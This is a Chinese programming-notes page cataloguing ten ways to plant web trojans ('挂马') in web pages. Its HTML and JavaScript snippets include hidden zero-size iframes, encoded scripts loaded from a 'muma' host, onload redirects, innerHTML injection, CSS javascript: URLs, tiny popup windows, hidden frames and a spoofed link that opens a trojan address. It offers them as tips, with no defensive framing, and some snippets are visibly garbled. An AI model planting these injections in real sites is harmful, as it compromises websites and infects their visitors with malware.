当前位置: 首页 > 编程笔记 >

网页挂马方式整理及详细介绍

江展
2023-03-14
本文向大家介绍网页挂马方式整理及详细介绍,包括了网页挂马方式整理及详细介绍的使用技巧和注意事项,需要的朋友参考一下

网页挂马方式

一:框架挂马

    <iframe src=地址 width=0 height=0></iframe>

 二:js文件挂马

  首先将以下代码

  document.write("<iframe width='0' height='0' src='地址'></iframe>");

  保存为xxx.js,

  则JS挂马代码为

  <script language=javascript src=xxx.js></script>

 三:js变形加密

  <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

  muma.txt可改成任意后缀

四:body挂马

  <body onload="window.location='地址';"></body>

 五:隐蔽挂马

  top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=";

六:css中挂马

  body {
  background-image: url('javascript:document.write("<script src=http://www.XXXhtml" target="_blank">.net/muma.js></script>")')}

七:js挂马

<SCRIPT language=javascript> 
  window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
  </script>

八:图片伪装

 <html>
  <iframe src="网马地址" height=0 width=0></iframe>
  <img src="图片地址"></center>
  </html>

九:伪装调用:

<frameset rows="444,0" cols="*">
  <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
  <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
  </frameset>

十:高级欺骗

 <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
  <SCRIPT Language="JavaScript">
  function www_163_com ()
  {
  var url="网马地址";
  open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

感谢阅读,希望能帮助到大家,谢谢大家对本站的支持!

 类似资料:
  • 本文向大家介绍JavaScript  event对象整理及详细介绍,包括了JavaScript  event对象整理及详细介绍的使用技巧和注意事项,需要的朋友参考一下 Event属性和方法: 1. type:事件的类型,如onlick中的click; 2. srcElement/target:事件源,就是发生事件的元素; 3. button:声明被按下的鼠标键,整数,1代表左键,2代表右键,4代表

  • 本文向大家介绍Google 地图API资料整理及详细介绍,包括了Google 地图API资料整理及详细介绍的使用技巧和注意事项,需要的朋友参考一下 Google 地图API 参考手册 地图 构造函数/对象 描述 Map() 在指定的 HTML 容器中创建新的地图,该容器通常是一个DIV元素。 叠加层 构造函数/对象 描述 Marker 创建一个标记。 MarkerOptions 标记的选项。由Di

  • 本文向大家介绍linux 用户和组命令整理及详细介绍,包括了linux 用户和组命令整理及详细介绍的使用技巧和注意事项,需要的朋友参考一下 1、列出当前系统上所有已经登录的用户名,注意:同一个用户登录多次,则只显示一次即可。 2、取出最后登录当前系统的用户的相关信息。 3、取出当前系统上被用户当作起默认shell的最多的那个shell 4、将/etc/passwd中第三个字段数值最大的后10个用户

  • 本文向大家介绍HTTPS 通信原理及详细介绍,包括了HTTPS 通信原理及详细介绍的使用技巧和注意事项,需要的朋友参考一下 HTTPS 通信原理 Https是基于安全目的的Http通道,其安全基础由SSL层来保证。最初由netscape公司研发,主要提供了通讯双方的身份认证和加密通信方法。现在广泛应用于互联网上安全敏感通讯。 我们都知道HTTPS能够加密信息,以免敏感信息被第三方获取。所以很多银行

  • 本文向大家介绍IOS Bundle详细介绍及使用方法,包括了IOS Bundle详细介绍及使用方法的使用技巧和注意事项,需要的朋友参考一下 什么是Bundle? A bundle is a directory with a standardized hierarchical structure that holds executable code and the resources used by

  • 本文向大家介绍预防网页挂马的方法总结,包括了预防网页挂马的方法总结的使用技巧和注意事项,需要的朋友参考一下 预防网页挂马的方法总结: 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的工作原理及种类、常见方式、执行方式、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。 1:网页